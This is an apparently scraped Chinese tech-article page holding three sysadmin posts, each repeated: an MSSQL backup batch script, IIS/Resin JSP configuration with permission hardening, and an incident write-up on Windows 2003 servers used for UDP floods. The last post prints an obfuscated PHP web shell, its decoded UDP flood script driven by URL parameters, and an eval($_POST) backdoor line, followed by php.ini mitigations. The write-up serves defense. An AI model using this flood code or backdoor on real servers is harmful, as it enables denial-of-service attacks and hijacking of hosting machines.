当前位置: 操作系统/服务器>linux
本页文章导读:
▪备份mssql数据库的批处理
提示 错误 22022: SQLServerAgent 当前未运行,因此,无法就本操作对其进行提示。 服务已经启动了.试了试只有把sql运行在system权限下才能执行作业.但不能降权了,就想到批处理.在一个目录下建.........
▪iis resin 配置 安全简单设置.
D:\jsp\jdk 装jdk D:\jsp\resin 放resin D:\jsp\web 网页文件 装jdk之前要弄好你的程序是用什么开发的,这个jdk不知道是不是不像.net那些高级兼容低级的.反正我之前装了jdk 1.6 网站就是出错.换了人家开.........
▪win2003遭受udp攻击导致带宽占用很大
后来发现在一个网站里面发现一个加密的.解密后看到很熟悉的 udp 莫非有关系?.果然 也有朋友遇到这样的情况,看来封禁对外udp是很必要的, 以下为转帖: 关于近期一些服务器遭受UDP攻击的说.........
[1]备份mssql数据库的批处理
来源: 互联网 发布时间: 2013-12-24
提示 错误 22022: SQLServerAgent 当前未运行,因此,无法就本操作对其进行提示。
服务已经启动了.试了试只有把sql运行在system权限下才能执行作业.但不能降权了,就想到批处理.在一个目录下建立一个1.bat 和一个1.sql
bat里面输入:
isql -U sa -P 数据库密码 -i D:\xx\1.sql
1.sql里放备份语句.
declare @filename nvarchar(100) set @filename='D:\xx\xx'+convert(char(10),getdate(),112) print @filename BACKUP DATABASE [数据库名] TO DISK = @filename WITH NOINIT , NOUNLOAD , NAME = N' 备份', NOSKIP , STATS = 10, NOFORMAT
如果是执行存储过程,提示找不到存储过程,请右击那个数据库帐户,属性 把默认数据库选成存储过程所在的数据库.
在任务计划中加上一个计划.就行了 这样直接无视SQLSERVERAGENT了.
服务已经启动了.试了试只有把sql运行在system权限下才能执行作业.但不能降权了,就想到批处理.在一个目录下建立一个1.bat 和一个1.sql
bat里面输入:
代码如下:
isql -U sa -P 数据库密码 -i D:\xx\1.sql
1.sql里放备份语句.
代码如下:
declare @filename nvarchar(100) set @filename='D:\xx\xx'+convert(char(10),getdate(),112) print @filename BACKUP DATABASE [数据库名] TO DISK = @filename WITH NOINIT , NOUNLOAD , NAME = N' 备份', NOSKIP , STATS = 10, NOFORMAT
如果是执行存储过程,提示找不到存储过程,请右击那个数据库帐户,属性 把默认数据库选成存储过程所在的数据库.
在任务计划中加上一个计划.就行了 这样直接无视SQLSERVERAGENT了.
[2]iis resin 配置 安全简单设置.
来源: 互联网 发布时间: 2013-12-24
D:\jsp\jdk 装jdk
D:\jsp\resin 放resin
D:\jsp\web 网页文件
装jdk之前要弄好你的程序是用什么开发的,这个jdk不知道是不是不像.net那些高级兼容低级的.反正我之前装了jdk 1.6 网站就是出错.换了人家开放时用的jdk 1.5就好了
装好jdk和解压好resin 设置环境变量.
CLASSPATH D:\jsp\jdk\lib\tools.jar;D:\jsp\jdk\lib\dt.jar
JAVA_HOME D:\jsp\jdk
RESIN_HOME D:\jsp\resin
复制 D:\jsp\resin\win32\isapi_srun.dll 到D:\jsp\web\scripts
在scripts下建立resin.ini
ResinConfigServer localhost 6800
IISPriority high
Resin/3.1.8 的这个端口是6800 可以在resin.conf 里修改
在默认网站新建→虚拟目录
别名:scripts
本地路径:D:\jsp\web\scripts 执行权限给 脚本和可执行文件
设置默认网站的ISAPI扩展 右键→属性→主目录→配置→添加
可执行文件 D:\jsp\web\scripts\isapi_srun.dll
扩展名 .jsp
这个加了的好处 就是iis能设置jsp的默认首页了,不然会报404错误
WEB服务扩展→添加一个新的WEB服务扩展
扩展名:jsp(可以随便填)
要求文件:D:\jsp\web\scripts\isapi_srun.dll
选中设置扩展状态为允许
设置D:\jsp\resin\conf\resin.conf。(这里是测试,真正ZKEYS开通JSP空间,这个文件你都不需要动他)
在文件中找到(大概是在最后)
</server>
</resin>上加如下
<host id="laomm.com" root-directory=".">
<!--
- configures an explicit root web-app matching the
- webapp's ROOT
-->
<web-app id="/" document-directory="D:\jsp\web"/>
</host>
把resin装进服务 cmd>>D:\jsp\resin\httpd.exe -install
这个鬼东西是用system权限运行的,太大了,新建的resin用户去掉users组给guests组,D:\jsp\resin目录加上rensin 读取和运行权限
D:\jsp\resin目录下的log和logs给写入权限,在服务里设置好用户名和密码重启下resin简单做了下.看网上说用 Java Security Manager 做这个安全,咱也不会 就这样凑合着用吧.有更好的方法再用,还好不用这个鬼东西开虚拟机.
8080端口可以过滤掉 或者用防火墙阻止了,我的没动,机房有白名单默认就不好访问ip..
D:\jsp\resin 放resin
D:\jsp\web 网页文件
装jdk之前要弄好你的程序是用什么开发的,这个jdk不知道是不是不像.net那些高级兼容低级的.反正我之前装了jdk 1.6 网站就是出错.换了人家开放时用的jdk 1.5就好了
装好jdk和解压好resin 设置环境变量.
CLASSPATH D:\jsp\jdk\lib\tools.jar;D:\jsp\jdk\lib\dt.jar
JAVA_HOME D:\jsp\jdk
RESIN_HOME D:\jsp\resin
复制 D:\jsp\resin\win32\isapi_srun.dll 到D:\jsp\web\scripts
在scripts下建立resin.ini
ResinConfigServer localhost 6800
IISPriority high
Resin/3.1.8 的这个端口是6800 可以在resin.conf 里修改
在默认网站新建→虚拟目录
别名:scripts
本地路径:D:\jsp\web\scripts 执行权限给 脚本和可执行文件
设置默认网站的ISAPI扩展 右键→属性→主目录→配置→添加
可执行文件 D:\jsp\web\scripts\isapi_srun.dll
扩展名 .jsp
这个加了的好处 就是iis能设置jsp的默认首页了,不然会报404错误
WEB服务扩展→添加一个新的WEB服务扩展
扩展名:jsp(可以随便填)
要求文件:D:\jsp\web\scripts\isapi_srun.dll
选中设置扩展状态为允许
设置D:\jsp\resin\conf\resin.conf。(这里是测试,真正ZKEYS开通JSP空间,这个文件你都不需要动他)
在文件中找到(大概是在最后)
</server>
</resin>上加如下
<host id="laomm.com" root-directory=".">
<!--
- configures an explicit root web-app matching the
- webapp's ROOT
-->
<web-app id="/" document-directory="D:\jsp\web"/>
</host>
把resin装进服务 cmd>>D:\jsp\resin\httpd.exe -install
这个鬼东西是用system权限运行的,太大了,新建的resin用户去掉users组给guests组,D:\jsp\resin目录加上rensin 读取和运行权限
D:\jsp\resin目录下的log和logs给写入权限,在服务里设置好用户名和密码重启下resin简单做了下.看网上说用 Java Security Manager 做这个安全,咱也不会 就这样凑合着用吧.有更好的方法再用,还好不用这个鬼东西开虚拟机.
8080端口可以过滤掉 或者用防火墙阻止了,我的没动,机房有白名单默认就不好访问ip..
[3]win2003遭受udp攻击导致带宽占用很大
来源: 互联网 发布时间: 2013-12-24
后来发现在一个网站里面发现一个加密的.解密后看到很熟悉的 udp 莫非有关系?.果然 也有朋友遇到这样的情况,看来封禁对外udp是很必要的,
以下为转帖:
关于近期一些服务器遭受UDP攻击的说明
近来我有一两台服务器显示经常受到udp攻击
导致服务器带宽占用到100%,用华盾查流量占用也无法查到具体是哪个站被攻击了,起初以为是cc攻击,因为停止了iis带宽就为0了,其实不然,都是部分用户被入侵导致的
下面我想说一下被入侵的原理
用户程序中的一个php页面的原代码:
<?php
/*
gl
*/
eval(gzinflate(base64_decode('
DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99DOfz6Bbek/SjOqkNtssCPNJkhTf2Xw
6zP4cdvIbfUZlQ1XhQchHDF3z39Ldpx33Lk9Xm78dUoCHeKfilO46tqg21DiEg+BCTz9QW/GD+lMGtThrSmdSEMLb
VkzvPt3s0UMS3mDx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE9L29swfGY
ibUTtUsoPqIRi7nFBpdmW0t5ECFWjzmfZe2xqERmtMLVpOqnY436BfrDxK10KYOfGAWN7s3geqB7RdV7WkxiBHZU4
wyW0LXsmyTdcdwk3TOjduh1F8cyvsgYuaejeLi23csLONsqDsU3gx60zLlm5XQ9jqhbyq949qvb2Us1dqsAGpYvfG
3IHY4TxaemBF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6litZOUL1GxMlavOlDW8/OMb7ci1
3dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgEJNSOLyzZIW8ApDL+V0/0Fstph3qQI+1qQuCw
xiZH1aaTMKJItxW5rmz4WyrGmOKCUtLvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOu
SJ+rRT+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS/TXCpeY1tyOl7Aw
e8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeRbtgx0oRpw2CnKoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnu
bV2kpIarL4bMVgNxv+9QwM8j1FvNR1yGa9lVsF1hM63tSpymtn4k1QFEGLVowe93kyhxGbRpNXICoPk3oqbB6DL3c
hsJ4OwQk4FOIc2k4MQ3tKy/vfv78/Pz///Pr+Gfd/')));
经过N次解密后的代码:
<?php
$packets = 0;
$ip = $_GET[\'ip\'];
$rand = $_GET[\'port\'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[\'time\'];
$time = time();
print \"Flooded: $ip on port $rand <br><br>\";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= \"X\";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\";
?>
<?php eval($_POST[ddos])?>
baidu了一下工作原理:
先把你代码放到一个正常的网页中.
通过url传递IP和端口以udp的方式打开.传递文件到服务器写出.
这样服务器就中招了.
也就是服务器显示udp攻击,带宽占用非常之严重,基本是100%,一般徘徊在97%-99%之间
解决方案:
在php.ini中限制php用网络。
在php.ini里设其值为Off
allow_url_fopen = Off
并且:
;extension=php_sockets.dll
前面的;号一定要有,意思就是限制用sockets.dll
然后重启IIS
我没关这个函数,有的程序需要貌似,直接把udp出站端口给封了.
以下为转帖:
关于近期一些服务器遭受UDP攻击的说明
近来我有一两台服务器显示经常受到udp攻击
导致服务器带宽占用到100%,用华盾查流量占用也无法查到具体是哪个站被攻击了,起初以为是cc攻击,因为停止了iis带宽就为0了,其实不然,都是部分用户被入侵导致的
下面我想说一下被入侵的原理
用户程序中的一个php页面的原代码:
<?php
/*
gl
*/
eval(gzinflate(base64_decode('
DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99DOfz6Bbek/SjOqkNtssCPNJkhTf2Xw
6zP4cdvIbfUZlQ1XhQchHDF3z39Ldpx33Lk9Xm78dUoCHeKfilO46tqg21DiEg+BCTz9QW/GD+lMGtThrSmdSEMLb
VkzvPt3s0UMS3mDx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE9L29swfGY
ibUTtUsoPqIRi7nFBpdmW0t5ECFWjzmfZe2xqERmtMLVpOqnY436BfrDxK10KYOfGAWN7s3geqB7RdV7WkxiBHZU4
wyW0LXsmyTdcdwk3TOjduh1F8cyvsgYuaejeLi23csLONsqDsU3gx60zLlm5XQ9jqhbyq949qvb2Us1dqsAGpYvfG
3IHY4TxaemBF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6litZOUL1GxMlavOlDW8/OMb7ci1
3dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgEJNSOLyzZIW8ApDL+V0/0Fstph3qQI+1qQuCw
xiZH1aaTMKJItxW5rmz4WyrGmOKCUtLvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOu
SJ+rRT+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS/TXCpeY1tyOl7Aw
e8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeRbtgx0oRpw2CnKoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnu
bV2kpIarL4bMVgNxv+9QwM8j1FvNR1yGa9lVsF1hM63tSpymtn4k1QFEGLVowe93kyhxGbRpNXICoPk3oqbB6DL3c
hsJ4OwQk4FOIc2k4MQ3tKy/vfv78/Pz///Pr+Gfd/')));
经过N次解密后的代码:
代码如下:
<?php
$packets = 0;
$ip = $_GET[\'ip\'];
$rand = $_GET[\'port\'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[\'time\'];
$time = time();
print \"Flooded: $ip on port $rand <br><br>\";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= \"X\";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\";
?>
<?php eval($_POST[ddos])?>
baidu了一下工作原理:
先把你代码放到一个正常的网页中.
通过url传递IP和端口以udp的方式打开.传递文件到服务器写出.
这样服务器就中招了.
也就是服务器显示udp攻击,带宽占用非常之严重,基本是100%,一般徘徊在97%-99%之间
解决方案:
在php.ini中限制php用网络。
在php.ini里设其值为Off
allow_url_fopen = Off
并且:
;extension=php_sockets.dll
前面的;号一定要有,意思就是限制用sockets.dll
然后重启IIS
我没关这个函数,有的程序需要貌似,直接把udp出站端口给封了.
最新技术文章: